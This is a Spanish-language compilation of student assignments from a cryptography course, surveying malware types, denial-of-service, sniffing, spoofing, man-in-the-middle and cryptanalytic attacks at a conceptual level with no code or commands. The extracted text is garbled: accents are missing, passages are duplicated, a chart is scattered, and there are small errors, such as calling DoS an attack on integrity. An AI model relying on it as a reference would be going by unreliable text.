pulsaciones del teclado y las almacenan para realizar operaciones fraudulentas como
son pagos desde cuentas de banco o tarjetas de crdito. La mayora de estos sistemas
son usados para recopilar contraseas de acceso, espiar conversaciones de chat u
otros fines. Los Stealers tambin roban informacin privada pero solo la que se
encuentra guardada en el equipo. Al ejecutarse comprueban los programas instalados
y si tienen contraseas recordadas, por ejemplo en los navegadores web la descifran.

Botnets: Son redes de computadoras infectadas, tambin llamadas zombies, que


pueden ser controladas a la vez por un individuo y realizan distintas tareas. Este tipo
de redes son usadas para el envo masivo de spam o para lanzar ataques contra
organizaciones. En una Botnet cada computadora infectada por el malware se loguea
en un canal de IRC u otro sistema de chat desde donde el atacante puede dar

instrucciones a todos los sistemas infectados simultneamente. Las botnets tambin


pueden ser usadas para actualizar el malware en los sistemas infectados
mantenindolos as resistentes ante antivirus u otras medidas de seguridad.

Rogue software: Hacen creer al usuario que la computadora est infectada por algn
tipo de virus u otro tipo de software malicioso, esto induce al usuario a pagar por un
software intil o a instalar un software malicioso que supuestamente elimina las
infecciones, pero el usuario no necesita ese software puesto que no est infectado.

Los Ransomware: Tambin llamados criptovirus o secuestradores, son programas que


cifran los archivos importantes para el usuario, hacindolos inaccesibles, y piden que
se pague un rescate para poder recibir la contrasea que permite recuperar los
archivos.

NOMBRE:
MARLON A. MOSQUERA 5108
KLEBER HIPO 5324
JIMENA HERNANDEZ 4815

MATERIA:
CRIPTOGRAFIA

OCTUBRE 2015 FEBRERO 2016


SEMESTRE

INTRODUCCIN A LOS ATAQUES INFORMATICOS

Cualquier equipo conectado a una red informtica puede ser vulnerable a un ataque.
Un "ataque" consiste en aprovechar una vulnerabilidad de un sistema informtico (sistema
operativo, programa de software o sistema del usuario) con propsitos desconocidos por el
operador del sistema y que, por lo general, causan un dao.
Los ataques siempre se producen en Internet, a razn de varios ataques por minuto en cada
equipo conectado. En su mayora, se lanzan automticamente desde equipos infectados (a
travs de virus, troyanos, gusanos, etc.) sin que el propietario sepa lo que est ocurriendo. En
casos atpicos, son ejecutados por piratas informticos.
Para bloquear estos ataques, es importante estar familiarizado con los principales tipos y
tomar medidas preventivas.
Los ataques pueden ejecutarse por diversos motivos:

para obtener acceso al sistema;

para robar informacin, como secretos industriales o propiedad intelectual;

para recopilar informacin personal acerca de un usuario;

para obtener informacin de cuentas bancarias;

para obtener informacin acerca de una organizacin (la compaa del usuario, etc.);

para afectar el funcionamiento normal de un servicio;

para utilizar el sistema de un usuario como un "rebote" para un ataque;

para usar los recursos del sistema del usuario, en particular cuando la red en la que
est ubicado tiene un ancho de banda considerable.

ATAQUES DE RED:
Detrs de todas las utilidades que tiene, tenemos a los usuarios malintencionados acechando,
ellos tienen muchas formas de atacar las redes de ordenadores, dejando inutilizados los
servidores donde nos conectamos o invadiendo nuestra privacidad. Los expertos en seguridad
informtica se encargan de parar estos ataques, y, en la medida de lo posible disear nuevas
arquitecturas que sean inmunes a los ataques.
En los ltimos aos la seguridad en la red se ha convertido en una prioridad, porque cada vez
hay ms usuarios malintencionados que buscan cualquier vulnerabilidad para romper la
seguridad, ya sea por superarse a s mismo o por beneficios econmicos.

TIPOS DE ATAQUES A LA RED:


Software malicioso o malware en Internet.
Atacar servidores y la infraestructura de la red.
Analizar los paquetes que fluyen por la red (sniffers).

Software malicioso o malware en Internet.


Un tipo de ataque a la red es la introduccin de malware en una pgina web. Cuando un
usuario navega por una web, puede, sin querer, infectarse por un malware. Los tres tipos ms
conocidos de malware son los virus, gusanos y troyanos.
Una vez que el malware ha infectado nuestro equipo (ordenador, pda, mvil) puede hacer
cualquier tipo de acciones. Las que ms destacan es el borrado de datos, recopilacin de
informacin de carcter personal (e-mails, contraseas, conversaciones). Tambin pueden
controlar todo lo que escribimos (Keyloggers) y enviarlo a su legtimo propietario (para uso de
todos los datos recogidos).
Cuando hemos sido infectados por malware, y creemos que todo funciona bien, podemos
estar participando en una botnet que los atacantes construyen para hacer un DDoS
(Denegacin de Servicio Distribudo), de esa forma, sin saberlo puede que estemos
participando en un ataque contra un servidor para bloquearlo.

Atacar servidores y la infraestructura de la red.


Ataques de denegacin de servicio (DoS). Un ataque DoS colapsa totalmente un servidor y
hace imposible (o muy lenta) la navegacin a travs de l. No slo se pueden atacar servidores
web, tambin servidores de correo electrnico, servidores DNS etc.
Un ataque DoS se puede atenuar mediante reglas especficas en el cortafuegos. Cuando
desde una misma IP se realizan miles de peticiones, un servidor puede denegar el acceso a la
IP atacante y de esa manera parar el ataque. El problema lo tenemos cuando el ataque es
distribudo, porque el servidor no da abasto para bloquear todas las IPs, y cada vez hay ms y
ms y el servidor termina por saturarse.
Podemos clasificar los ataques de denegacin de servicio en tres categoras:
Inundacin de conexiones
Inundacin de ancho de banda
Ataque de vulnerabilidad
Inundacin de conexiones: normalmente el protocolo que se usa es TCP, al ser conectivo,
fiable y orientado a conexin. El propio protocolo TCP pide el reenvo de los paquetes perdidos
y se encarga de la fragmentacin y el re-ensamblado (no como UDP sobre IP). El atacante
establece cientos de conexiones en el servidor hasta que que se colapsa y no puede aceptar las
conexiones de usuarios legtimos.

Inundacin de ancho de banda: el usuario malintencionado enva muchos paquetes al


servidor, impidiendo que los paquetes legtimos puedan llegar a l, no hay suficiente ancho de
banda para ms paquetes.

Ataque de vulnerabilidad: si en el servidor hay alguna vulnerabilidad, el atacante se centra en


explotarla mandando mensajes construidos especficamente para provocar el fallo de la
mquina.
Para colapsar un servidor por inundacin de ancho de banda, el ataque ha de ser distribudo
(DDoS) ya que actualmente los servidores tienen un gran ancho de banda. Adems, sera muy
fcil detectarlo ya que slo sera desde una IP (en DoS no distribudo). El ancho de banda del
ataque se debe acercar al ancho de banda mximo de dicho servidor para colapsarlo.
Analizar los paquetes que fluyen por la red (sniffers).
Hoy en da, la mayora de los usuarios nos conectamos por WiFi a internet por la comodidad
que ello supone, ya que podemos navegar tranquilamente desde el sof de nuestra casa, o
desde nuestro nuevo mvil de ltima generacin.
Un sniffer es un programa, tambin conocido como analizador de paquetes de red, o similar.
Un ejemplo es WireShark, con el que puedes ver todo lo que fluye por la red de nuestro
ordenador.
Si hacemos un ataque Man in The Middle, y arrancamos WireShark, podremos ver todo lo que
est circulando por la red, incluyendo el trfico de todos los que hay conectados a la red.
Cuando estamos conectados a una red WiFi domstica con cifrado WEP (muy dbil) o
WPA/WPA2 (mucho ms seguro), todos los paquetes fluyen por el aire, pero si usas clave,
estarn cifrados. El problema de seguridad reside si un usuario malintencionado crackea la
clave de cifrado inalmbrica y se conecta a la red podra sniffar todo el trfico que hay en ella.
Una solucin para que no haya escuchas no deseadas, pasara por crear en un lugar de
confianza un servidor VPN y conectarte a travs de l redirigiendo el trfico de internet, en
esta misma web tienes el manual completo para que ests 99% seguro en cualquier red
inalmbrica o cableada. No tienes por qu tener un ordenador permanentemente encendido,
el Firmware Tomato RAF de Victek tiene la opcin de crear dos servidores OpenVPN.

ATAQUES DE SOFTWARE:
Software malicioso: Clasificacin
Virus
Malware que modifica el comportamiento normal de la computadora sin la
autorizacin del usuario.
Archivos ejecutables, sectores de arranque, BIOS, tabla de participacin.
Gusanos:
Iworm
Malware que se duplica a si mismo
No necesita modificar ficheros como el virus, puede residir en memoria.
Pueden dejar el PC sin recursos, duplicarse a travs de internet usando protocolos
como SMTP, IRC, P2P
Pueden ser la puerta de entrada de controles remotos por parte de terceras personas
(ejemplo: Blaster Worm)
Troyanos
Malware que se presenta al usuario como programas normales pero que al ejecutarlo
realizan acciones dainas.
Se utilizan para establecer las denominadas botnet Redes de ordenadores infectados
que a su vez se suelen usar para ataques de denegacin de servicio.
Rootkits
Conjunto de programas destinados a tener un ordenador bajo control, permitiendo su
acceso remoto por personas no autorizadas y ocultar dicho control de cara al usuario.
Se pueden utilizar junto con los troyanos para establecer una botnet
Backdoors
Secuencias de cdigo especiales introducidas dentro de un sistema que permiten
saltarse uno o varios sistemas de seguridad dentro del sistema.
Muchas veces se introducen en el desarrollo del propio sistema con fines lcitos
(testeo)
Spyware
Malware dedicado a recoger informacin del ordenador donde se encuentra instalado
y a mandarla a travs de la red sin la autorizacin del propietario del PC.
Adware (Advertisement + software)
Software que contiene publicidad que debe ser visualizada para usar el programa.
Crimeware
Software ideado para cometer crmenes (generalmente de tipo financiero y en el
mundo empresarial).
Dialer:

Software que utilizan llamadas a nmeros de telfono para conectarse a internet.


Legitimos: usan los nmeros de telfono provistos por el proveedor de servicios.
Malware: usan nmeros de telfono de tarificacin especial
Hijacker
Programas que cambian la configuracin del navegador para cargar pginas no
autorizadas.
Joke
Software que tratan de hacer pensar al usuario que ha sido infectado por un virus.
Keylogger
Malware que registra las pulsaciones de teclado y, eventualmente, puede mandarlas a
travs de la red para registrar sitios visitados, contraseas, correos, etc.
Hoax:
Mensajes de correo que, mediante tcnicas de ingeniera social, tratan de propagarse.
El objetivo puede ser muy amplio, a veces, simplemente recoger direcciones de correo
vlidas para spam.

Spam:
Correo electrnico con publicidad no solicitada.
Rogue:
Falso programa de seguridad Ejemplo: http://blogs.esetla.com/laboratorio/2008/12/02/animaciones-calidad-antivirus-falsos/
FakeAV:
Simula ser un antivirus. (El rogue es una definicin mas amplia)

CUADRO SINOPTICO:

Ataques Informaticos

Disponibilida
d

Denial of
SErvice (DoS)

Replay

Ataque de
dia 0

Spoofing

Confidenciali
dad

Autenticacio
n

Man in
middle

Trashing

Tampering o Data
Diddling

Un usario
anota su
psw y su
login.

Modificacio
no
eliminacion
de datos

Integridad

Malware

Grayware
Es un
ataque de
denegacion
de servicio

La
transmisin
de datos es
repetida o
retardada

Ataque a un
ordenador
que tenga
vulnerabilid
ades

Ataque para
saturar la
red

ARP DNS
WEB EMAIL GPS

Existe un
atacante
que
superviisa
una
comunicacio
n en 2
partes.

Virus y
gusanios

Backdoor

Infiltrarse y
daar un
computador
o Sistema
informatico

Drive-by
Download

Rootkits

Troyanos

Hijackers

ESCUELA SUPERIOR POLITECNICA DE CHIMBORAZO


Ataque
A lo largo del tiempo, el avance de los medios tecnolgicos y de comunicacin ha provocado el
surgimiento de nuevos vectores de ataques y de nuevas modalidades delictivas que han
transformado a Internet y las tecnologas informticas en aspectos sumamente hostiles para
cualquier tipo de organizacin, y persona, que tenga equipos conectados a la World Wide Web
(www).
Un ataque informtico consiste en aprovechar alguna debilidad o falla (vulnerabilidad) en el
software, en el hardware, e incluso, en las personas que forman parte de un ambiente
informtico; a fin de obtener un beneficio, por lo general de ndole econmico, causando un
efecto negativo en la seguridad del sistema, que luego repercute directamente en los activos
de la organizacin.

Tipos de ataque
1. Ataques de autenticacin
Este tipo de ataque tiene como objetivo engaar al sistema de la vctima para ingresar al
mismo. Generalmente este engao se realiza tomando las sesiones ya establecidas por la
vctima u obteniendo su nombre de usuario y password.

Spoofing-Looping:

Puede traducirse como "hacerse pasar por otro" y el objetivo de esta tcnica es actuar en
nombre de otros usuarios, usualmente para realizar tareas de Snooping. Una forma comn
de Spoofing es conseguir el nombre y password de un usuario legtimo para una vez
ingresado al sistema tomar acciones en nombre de l.
2. Denial of Service (DoS):
Los protocolos existentes actualmente fueron diseados para ser empleados
en
una
comunidad abierta y con una relacin de confianza mutua. La realidad indica que es ms fcil
desorganizar el funcionamiento de un sistema que acceder al mismo; as los ataques de
Negacin de Servicio tienen como objetivo saturar los recursos de la vctima de forma tal que
se inhabiliten los servicios brindados por la misma.
Jamming o Flooding:
Este tipo de ataques desactivan o saturan los recursos del sistema. Un atacante puede
consumir toda la memoria o espacio en disco disponible, as como enviar tanto trfico a la
red que nadie ms pueda utilizarla.

3. Modificacin (integridad).
La modificacin o dao se puede dar como:

Tampering o Data Diddling: Esta categora se refiere a la modificacin desautorizada


de los datos o el software instalado en el sistema vctima (incluyendo borrado de
archivos). Son particularmente serios cuando el que lo realiza ha obtenido derechos de
Administrador o Supervisor, con la capacidad de disparar cualquier comando y por
ende alterar o borrar cualquier informacin que puede incluso terminar en la baja
total del sistema

4. Trashing (Cartoneo).
Generalmente, un usuario anota su login y password en un papelito y luego, cuando lo
recuerda, lo arroja a la basura. Este procedimiento por ms inocente que parezca es el
que puede aprovechar un atacante para hacerse de una llave para entrar el sistema..."nada se
destruye, todo se transforma". El Trashing puede ser fsico (como el caso descripto) o lgico,
como analizar buffers de impresora y memoria, bloques de discos, etc.

Ataques en la red
Internet es a da de hoy, una herramienta imprescindible para la mayora de la gente,
incluyendo empresas, universidades y el gobierno de los diferentes pases. La gente confa en
internet para hacer sus actividades profesionales y personales pero detrs de todas las
utilidades que tiene, tenemos a los usuarios malintencionados acechando, ellos tienen muchas
formas de atacar las redes de ordenadores, dejando inutilizados los servidores donde nos
conectamos o invadiendo nuestra privacidad. Los expertos en seguridad informtica se
encargan de parar estos ataques, y, en la medida de lo posible disear nuevas arquitecturas
que sean inmunes a los ataques.
Software malicioso o malware en Internet.
Un tipo de ataque a la red es la introduccin de malware en una pgina web. Cuando un
usuario navega por una web, puede, sin querer, infectarse por un malware. Los tres tipos ms
conocidos de malware son los virus, gusanos y troyanos.
Una vez que el malware ha infectado nuestro equipo (ordenador, pda, mvil) puede hacer
cualquier tipo de acciones. Las que ms destacan es el borrado de datos, recopilacin de
informacin de carcter personal (e-mails, contraseas, conversaciones). Tambin pueden
controlar todo lo que escribimos (Keyloggers) y enviarlo a su legtimo propietario (para uso de
todos los datos recogidos). Normalmente una caracterstica comn de todos ellos es que se
auto-replican, para infectar a ms usuarios, de esta forma se extender de forma exponencial.
Cuando hemos sido infectados por malware, y creemos que todo funciona bien, podemos
estar participando en una botnet que los atacantes construyen para hacer un DDoS
(Denegacin de Servicio Distribudo), de esa forma, sin saberlo puede que estemos
participando en un ataque contra un servidor para bloquearlo.

Atacar servidores y la infraestructura de la red.


Ataques de denegacin de servicio (DoS). Un ataque DoS colapsa totalmente un servidor y
hace imposible (o muy lenta) la navegacin a travs de l. No slo se pueden atacar servidores
web, tambin servidores de correo electrnico, servidores DNS etc. Un ataque DoS se puede
atenuar mediante reglas especficas en el cortafuego. Cuando desde una misma IP se
realizan miles de peticiones, un servidor puede denegar el acceso a la IP atacante y de esa
manera parar el ataque. El problema lo tenemos cuando el ataque es distribudo, porque el
servidor no da abasto para bloquear todas las IPs, y cada vez hay ms y ms y el servidor
termina por saturarse. Podemos clasificar los ataques de denegacin de servicio en tres
categoras:

Inundacin de conexiones: normalmente el protocolo que se usa es TCP, al ser


conectivo, fiable y orientado a conexin. El propio protocolo TCP pide el reenvo de los
paquetes perdidos y se encarga de la fragmentacin y el re-ensamblado (no como UDP
sobre IP). El atacante establece cientos de conexiones en el servidor hasta que se
colapsa y no puede aceptar las conexiones de usuarios legtimos.
Inundacin de ancho de banda: el usuario malintencionado enva muchos paquetes al
servidor, impidiendo que los paquetes legtimos puedan llegar a l, no hay suficiente
ancho de banda para ms paquetes.
Ataque de vulnerabilidad: si en el servidor hay alguna vulnerabilidad, el atacante se
centra en explotarla mandando mensajes construidos especficamente para provocar
el fallo de la mquina.

Para colapsar un servidor por inundacin de ancho de banda, el ataque ha de ser distribudo
(DDoS) ya que actualmente los servidores tienen un gran ancho de banda. Adems, sera muy
fcil detectarlo ya que slo sera desde una IP (en DoS no distribudo). El ancho de banda del
ataque se debe acercar al ancho de banda mximo de dicho servidor para colapsarlo.
Un ejemplo muy reciente de Ataque DDoS fue el realizado a la Sgae, aunque consiguieron que
la pgina no fuera accesible, no fue gracias a ellos. Acens, el hosting donde se aloja, des-enrut
dicha web (la direccin IP) para que no afectara a ninguna de las otras webs que estn alojadas
all (entre las que destacan el Grupo ADSLZone al completo, incluyendo RedesZone). El
problema de los ataques distribudos es que no sabes si el que realiza las peticiones es un
atacante, o el legtimo usuario, por tanto es mucho ms difcil de detectar y sobre todo, mucho
ms difcil defenderse de ellos.
Analizar los paquetes que fluyen por la red (sniffers).
Hoy en da, la mayora de los usuarios nos conectamos por WiFi a internet por la comodidad
que ello supone, ya que podemos navegar tranquilamente desde el sof de nuestra casa, o
desde nuestro nuevo mvil de ltima generacin y la alegra que da ir al pueblo y encontrar
una red WiFi sin contrasea, y aprovechar para leer el correo, dar un repaso a las redes
sociales y hablar por mensajera instantnea con nuestros amigos. Pues si haces todo esto,
presta atencin porque puede que tu seguridad y privacidad est peligrosamente
comprometida.

Un sniffer es un programa, tambin conocido como analizador de paquetes de red, o similar.


Un ejemplo es WireShark, con el que puedes ver todo lo que fluye por la red de nuestro
ordenador. Si hacemos un ataque Man in The Middle, y arrancamos WireShark, podremos ver
todo lo que est circulando por la red, incluyendo el trfico de todos los que hay conectados a
la red. Cuando estamos conectados a una red WiFi domstica con cifrado WEP (muy dbil) o
WPA/WPA2 (mucho ms seguro), todos los paquetes fluyen por el aire, pero si usas clave,
estarn cifrados. El problema de seguridad reside si un usuario malintencionado crackea la
clave de cifrado inalmbrica y se conecta a la red podra sniffar todo el trfico que hay en ella.
Por ello, os recomiendo encarecidamente, que dotis de una buena proteccin a vuestras
redes inalmbricas, ya que los routers con firmwares por defecto, proveen WPA2 con cifrado
AES que es muy seguro, y sin embargo hay mucha gente que sigue usando WEP. Una solucin
para que no haya escuchas no deseadas, pasara por crear en un lugar de confianza un
servidor VPN y conectarte a travs de l redirigiendo el trfico de internet, en esta misma web
tienes el manual completo para que ests 99% seguro en cualquier red inalmbrica o cableada.
No tienes por qu tener un ordenador permanentemente encendido, el Firmware Tomato RAF
de Victek tiene la opcin de crear dos servidores OpenVPN. No slo ocurre el sniffing en redes
inalmbricas, en las redes LAN cableadas tambin ya que difunden los mismos paquetes pero
por cable ethernet, y por tanto son vulnerables a ser analizados y modificados. Los programas
sniffer, al no inyectar paquetes en el canal de transmisin, son muy difciles de detectar, por
tanto debemos tener cuidado dnde y cmo nos conectamos a internet.
Suplantacin de identidad
Un usuario malintencionado puede crear un paquete con una direccin de origen, un
contenido y una direccin de destino aleatorio. A continuacin transmite dicho paquete a
internet, que reenviar el paquete a su destino. El router de la vctima podra ejecutar dicho
paquete y sin saber estara ejecutando un comando para modificar la tabla de reenvo. La
suplantacin IP es poder inyectar paquetes con una direccin de origen falsa. Es una de las
muchas formas para hacerse pasar por otra persona. Debemos tener en cuenta que una IP
identifica inequvocamente a un usuario a una hora determinada en la red de redes. Para
solucionar este problema debemos tener autenticacin en el punto terminal.
Modificacin y borrado de datos enviados
Un atacante para conseguir modificar o borrar los datos, debe situarse en la ruta de
comunicaciones entre dos usuarios. Esto se conoce como ataque de interposicin, o lo llamado
Man In The Middle. El atacante no slo puede sniffar todo el trfico (examinarlo, tal y como
hemos hablado antes) sino que tambin puede inyectar, modificar o borrar los paquetes que
fluyen por la red. Un ataque de interposicin, viola uno de los estndares de la seguridad en
internet: la integridad de los datos. Otros estndares de la seguridad de internet como la
confidencialidad y autenticacin no garantiza la integridad de los datos.

Ataques de software
Con el paso del tiempo, el software malicioso (o malware) se ha convertido en una verdadera
amenaza que puede comprometer tu ordenador, archivos, fotos, msica y datos bancarios y

poner en peligro a tus hijos. No obstante, puedes tomar precauciones para evitar convertirte
en vctima de los ciberataques y amenazas de seguridad.
- Malware
Es un tipo de software que tiene como propsito infiltrarse y daar una computadora o
sistema de informacin sin el consentimiento de los propietarios. Los malwares son
considerados en funcin de los efectos que provoquen, incluyendo diferentes tipos son los
virus, gusanos, troyanos, hijackers, stealers, ransonware, entre otros.
- Grayware o greynet
Los Grayware o greynet son software maliciosos que no son tan peligrosos como los malwares.
Suelen utilizarse para clasificar las aplicaciones o programas de cmputo y se instalan sin la
autorizacin de los usuarios. Los tipos de grayware que existe son Adware, Dialers y spyware

Bibliografa:
http://www.redeszone.net/2010/11/03/ataques-a-las-redes-listado-de-diferentes-ataques-alas-redes-de-ordenadores/#sthash.LnrD4WCf.dpuf
http://www.coreoneit.com/tipos-de-ataques-informaticos/
http://www.fsc.ccoo.es/comunes/recursos/99922/doc28596_Seguridad_informatica.pdf
http://es.scribd.com/doc/19397003/Tipos-de-Ataques-informaticos#scribd
http://seguridadanggie.blogspot.com/2011/11/confidencialidad.html

CRIPTOGRAFA

ATAQUES

INTEGRANTES:
Efran Quingue(5809)
John Cabezas(5855)
Bryan Martnez(5812)

Un ataque informtico, se trata de aprovechar alguna


debilidad o falla en el software, en el hardware e incluso
en el personal involucrado en la informtica para causar
perjuicios.

Este ataque causa un efecto negativa en la seguridad de


los sistemas y de esta manera afecta muy directamente a
los activos de la organizacin.

DEFINICIN

1
2
3
4
5

RECONOCIMIENTO (Obtencin de la
informacin de la victima)
EXPLORACION (Sondear a la victima y
obtener informacin como direcciones IP)
OBTENER ACCESO (Explotacin de
vulnerabilidades del sistema)
MANTENER ACCESO (Implementacin de
herramientas para acceso de cualquier lugar)
BORRAR HUELLAS (Eliminacin de pistas,
para evitar la deteccin del ataque)

Como evoluciona ? ..

ATAQUE ESTRUCTURADO
Involucra los hacker que conoce el desarrollo de sistemas y
saben de cdigos, estas personas hacen una exploracin
sistematizada para el ataque preciso.

ATAQUE NO ESTRUCTURADO
Involucra personas sin experiencias que realizan el ataque
con software como Script o Shell, inclusive hacen amenazas
falsas solo para probar la vulnerabilidad del sistema

TIPOS ATAQUE

(1-4)

ATAQUE EXTERNO
Este ataque hacen personas externas a la empresas, buscan
mecanismos que permitan acceder a sistemas no autorizados
recolectando informaciones.

ATAQUE INTERNO
Estos atques son los mas peligrosos, ya que realizan
personas que tienen autorizaciones segn FBI entre 60% y
80% son el mal uso de las cuentas.

TIPOS ATAQUE

(2-4)

ATAQUE PASIVOS
Escuchan contraseas de sistemas.
Anlisis de trafico.
Captura de datos.

ATAQUE ACTIVO
Intentar acceder las cuentas de terceros.
Denegacin de servicios.
Modificacin de mensajes y datos.

TIPOS ATAQUE

(3-4)

DENEGACION DE SERVICIOS
Atacan mas a tiendas informticas.
Son bien efectivos.
Trata de prevenir el acceso a ciertos servicios volviendo esta
inactiva.

ATAQUE SNIFFING DE PAQUETES


Explota caractersticas de las LANS de Ethernet,
monitorean el trafico y interceptan la informacin.

TIPOS ATAQUE

(4-4)

DESBORDAMIENTO DE BUFFER
Enva mas trafico de lo que puede anticipar un programa DoS

INUNDACION SYN
Envi de muchos paquetes en inicios de sesin para desviar entre
ellas.

LAGRIMAS
Se divide el paquete extenso en pequeos y el la IP del atacante
asigna valores muy confusos para que el sistema operativo
proceso muchos valores y caiga el sistema.

ATAQUE DNS
Conocidos como zombies, se infiltran dentro de las maquinas y
enva muchas DNS con el objetivo de atorar la comunicacin.

TIPOS DE ATAQUES DENEGACION DE SERVICIOS

Virus y
Gusanos

Backdoor o
Puerta Trasera
Drive-by
Downloads

Malware
Proposito:
infiltrase y daar
una computadora
o sistema
informtico

Rootkits

Troyanos

Hijackers
Keyloggers y
Stealers

Ataques de
Software

Botnets
Rogue
software

Grayware
Propsito:
Clasificar
aplicaciones o
programas

Los
Ransomware
Adware

Dialers

Spyware

ATAQUES DE SOFTWARE

AUTENTICIDAD Y DISPONIBILIDAD
MODIFICACION DE MENSAJES TRANSMITIDOS
Se trata del reenvi de datos que han sido trasmitidos, tras
haberlos modificado de forma maliciosa. Este tipo de
ataques maliciosos se suelen ocupar con informaciones
bancarias.

ATAQUE DE RED

(1-6)

ROBO DE INFORMACION
Este tipo de ataque roba la informacin mediante
intercepcin de mensajes vulnerando confidencialidades.

RECONOCIEMIENTO DE SISTEMAS
Este tipo de ataque trata de obtener informacin previa
sobre la organizacin de la red, realizndolo mediante un
escaneo de puertos para ver su sistema operativo

VULNERABILIDAD DE LOS SISTEMAS


Este tipo consiste en la deteccin de fallas para el desarrollo
de herramientas de ataque conocidas como exploits.

ATAQUES DE RED (2-6)

CONFIDENCIALIDAD
ATAQUE POR INTROMISION
Esta se da cuando alguien abre archivos uno tras otros en
nuestra computadora hasta encontrar algo que sea de su
inters. Puede ser una persona que convive con nosotros.

ATAQUE DE RED

(3-6)

ANALISIS DE TRFICO (sniffers)


Un sniffer es un programa, tambin conocido como analizador de
paquetes de red, o similar. Un ejemplo es WireShark, con el que
puedes ver todo lo que fluye por la red de nuestro ordenador.
Cuando estamos conectados a una red WiFi domstica con cifrado
WEP (muy dbil) o WPA/WPA2 (mucho ms seguro), todos los
paquetes fluyen por el aire, pero si usas clave, estarn cifrados. El
problema de seguridad reside si un usuario malintencionado
crackea la clave de cifrado inalmbrica y se conecta a la red
podra sniffar todo el trfico que hay en ella.

ATAQUES DE RED

(4-6)

ATAQUE DE ESPIONAJE EN LINEA


Se da cuando alguien escucha una conversacin y no es
invitada a ella. es muy comn en redes inalmbricas ya que
no se requiere de un dispositivo conectado a la red, basta,
con un rango donde la seal de la red llegue a un automvil
o un edificio cercano.

ATAQUES DE RED

(5-6)

INTEGRIDAD
ATAQUE DE INTERSECCION
Este ataque se dedica a alterar la informacin que se encuentra
validada en su computadora en su base de datos es muy comn en
los bancos y casa de bolsas.

ATAQUE DE DENEGACION DE SERVICIOS


Este ataque consiste en negar el uso de los recursos a los usuarios
legtimos del sistema, de informacin o inclusive de algunas
capacidades del sistema como por ejemplo:
Intenta inundar una red, impidiendo el trafico legtimo de red.
Intenta romper la red entre 2 computadoras.
Intenta impedir el acceso de un usuario individual a un servicio.
Intenta romper los servicios a un sistema.

ATAQUES DE RED (6-6)

CRIPTOGRAFIA
Riobamba, 25 de Noviembre del 2015
REALIZADO POR:

ANDRES VALLE (5592)


CRISTIAN PAZMIO (5958)
ATAQUES CRIPTOGRAFICOS

Definicin de Ataque?
Un ataque criptogrfico es un mtodo de sortear la seguridad de un sistema criptogrfico
mediante la bsqueda de debilidades en un cdigo, un mensaje cifrado, un protocolo
criptogrfico o un esquema de manejo de claves. A este proceso tambin se lo llama
"Criptoanlisis".

Tipos de Ataques.
Existen diferentes tipos de ataques criptogrficos:
1. Ataque de slo texto cifrado.
El analista dispone de un texto cifrado y quiere obtener el texto en claro o la clave. Se pueden
usar mtodos de fuerza bruta (probando todas las claves posibles hasta que obtenemos un
mensaje con sentido) o basados en diccionario (probando nicamente con un subconjunto de
las claves posibles, por ejemplo si las claves son palabras). Es importante disponer de
suficiente texto en clave para que sea fcil identificar cual es el texto en claro correcto
2. Ataque de texto en claro conocido.
El analista dispone de un texto en claro y su correspondiente texto cifrado, lo que permite
reducir el espacio de bsqueda de claves u obtener estadsticas que pueden usarse para hacer
deducciones en otros textos cifrados.
3. Ataque de Texto en Claro conocido.
El analista dispone de un texto en claro y su correspondiente texto cifrado, lo que permite
reducir el espacio de bsqueda de claves u obtener estadsticas que pueden usarse para hacer
deducciones en otros textos cifrados.
4. Ataque de texto en claro elegido.
El analista puede elegir el texto en claro y obtener el texto cifrado correspondiente. Este tipo
de ataque puede evitar duplicados y centrarse ms en las debilidades del algoritmo.
5. Ataque de texto en claro elegido adaptativo.
Es la versin adaptativa del ataque anterior.

6. Ataque de Hombre en Medio.


Este ataque es relevante para las comunicaciones criptogrficas y los protocolos de
intercambio de llaves. La idea es que cuando dos partes, A y B, estn intercambiando llaves
por comunicaciones seguras (por ejemplo utilizando Diffie-Hellman), un adversario
(intruso) se posiciona entre A y B en la lnea de comunicacin.

Segn los elementos afectados se detalla 3:


Confidencialidad. Un atacante podra robar informacin sensible como contraseas u otro tipo
de datos que viajan en texto claro a travs de redes confiables, atentando contra la
confidencialidad al permitir que otra persona, que no es el destinatario, tenga acceso a los
datos. Un ejemplo que compromete este elemento es el envenenamiento de la tabla ARP (ARP
Poisoning).
Integridad. Mientras la informacin se transmite a travs del protocolo de comunicacin, un
atacante podra interceptar el mensaje y realizar cambios en determinados bits del texto
cifrado con la intencin de alterar los datos del criptograma. Este tipo de ataques se denomina
Bit-Flipping y son considerados ataques contra la integridad de la informacin. El ataque no se
lleva a cabo de manera directa contra el sistema de cifrado pero s en contra de un mensaje o
de una serie de mensajes cifrados. En el extremo, esto puede convertirse en un ataque de
denegacin de servicio contra todos los mensajes en un canal que utiliza cifrado.
Disponibilidad. En este caso, un atacante podra utilizar los recursos de la organizacin, como
el ancho de banda de la conexin DSL para inundar de mensaje el sistema vctima y forzar la
cada del mismo, negando as los recursos y servicios a los usuarios legtimos del sistema. Esto
se conoce como Denial of Service (DoS) y atenta directamente contra la integridad de la
informacin.
Ataques a Redes
Los primeros ataques a travs de la red se Tcnico en Seguridad de Redes y Sistemas Los
primeros ataques a travs de la red se aprovechaban de las vulnerabilidades del protocolo
TCP/IP.
Conforme TCP/IP ha ido superando esas vulnerabilidades y se ha hecho ms fuerte en el
mbito de la seguridad, los ataques se han dirigido a la capa de aplicaciones y, principalmente,
a la Web
Tipos de Ataques en TCP/IP

Sniffing (Rastreo)
Spoofing (Falsificacin)
DoS (Denegacin de Servicio)

Sniffing

Este ataque consiste en supervisar el trfico generado en una red.


El elemento utilizado para escuchar todo lo que se mueve por la red se denomina
sniffer o analizador de red, que puede ser tanto software como hardware.
El software utilizado como sniffer activa lo que se conoce como modo promiscuo de
la tarjeta de red en la mquina donde se ejecuta, lo que permite obtener todas las
tramas Ethernet que se envan dentro de la misma Red de rea Local.
Para poder activar el modo promiscuo, en sistemas UNIX debemos ser usuario root,
mientras que en sistemas WINDOWS debemos tener permisos de administrador.
Los sniffers activan este modo de manera automtica.
Actualmente, las conexiones a travs de cable se llevan a cabo mediante switches, en
lugar de los antiguos hubs, lo que hace que el trfico sea dirigido a su destino, de
forma que se complica el uso de sniffers.
Para la escucha en redes inalmbricas el sniffing sigue siendo muy eficaz y utilizado.

Spoofing

Este ataque consiste en suplantar la identidad de otra mquina de la red para tener
acceso a los recursos de un tercer sistema de manera maliciosa, basndose en algn
tipo de confianza, ya sea el nombre o la direccin IP del host suplantado.
Las tcnicas de spoofing van desde engaar al propio servidor falseando simplemente
una direccin IP, hasta lo que sera engaar directamente al usuario final (entrando ya
en Ingeniera Social).
Uno de los ejemplos ms tpicos de spoofing es el phishing.
Existen varias tcnicas de spoofing:
IP Spoofing
